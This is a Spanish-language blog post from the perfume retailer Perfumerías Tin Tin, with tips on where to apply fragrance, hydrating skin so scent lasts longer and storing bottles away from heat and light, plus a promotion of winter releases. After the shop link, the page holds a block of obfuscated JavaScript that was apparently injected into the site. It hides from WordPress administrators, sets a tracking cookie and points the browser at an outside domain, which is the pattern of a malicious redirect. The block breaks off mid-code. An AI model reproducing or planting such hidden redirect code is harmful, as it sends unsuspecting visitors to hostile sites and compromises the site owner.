¿Eres fiel a una fragancia desde hace años o te gusta cambiar de aroma según la temporada y situación? En Perfumerías Tin Tin creemos que las fragancias forman parte de personalidad y del estado de ánimo, evocan recuerdos, te complementan y realzan tu carácter y belleza.

En el post de hoy, queremos compartir contigo algunos secretos y trucos del mundo de la perfumería para que tu fragancia dure más y que dejes una estela perfumada en cada paso que das con mucha elegancia y chispa.

Empecemos por dónde aplicar el perfume o eau de toilette. Una mujer debe llevar el perfume donde quiera ser besada, como decía Coco Chanel. Busca las zonas de pulsación y calor de tu cuerpo; el cuello, la nuca, detrás de las orejas, el escote y la parte posterior de las rodillas. ¡Y nunca frotes tu piel después de aplicarlo! Esto romperá las partículas del aroma y como consecuencia la fragancia se evaporará antes.

¡Hidrata tu piel! ¿sabías que los perfumes duran más sobre la piel grasa que sobre la piel seca? Te recomendamos hidratar tu piel, no solo para conseguir que esté suave y sedosa, sino que de esta manera tu perfume dure más. ¡Si utilizas una crema hidratante de la misma línea de tu fragancia potenciarás aún más su aroma!

Y el mejor consejo que podemos darte es que disfrutes de tu perfume. No lo guardes solo para ocasiones especiales por pena de gastarlo, al fin y al cabo, como todos los productos cosméticos, los perfumes tienen una vida de 3 años y sus componentes se pueden deteriorar por la luz y cambios de temperatura.

22639117_223630908173181_3927852982099509248_n

¿Cómo conservarlo? Te recomendamos almacenar tu perfume en un sitio seco y oscuro, preferentemente dentro de su propia caja. El peor sitio donde puedes tenerlo es en el baño ya que el calor y la humedad de esta habitación no son buenos aliados.

Tienes que ver las novedades en perfumería que hemos recibido para este invierno, empezando por un Absolu de Parfum de edición limitada de Chloé, pasando por una versión más ligera y brillante del original Decadence de Marc Jacobs, hasta llegar al primer Chipre floral almizclado de Bvlgari con Goldea The Roman Night.

Estas y muchas otras novedades de las mejores marcas de perfumes al mejor precio en nuestra tienda online www.perfumestintin.com

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone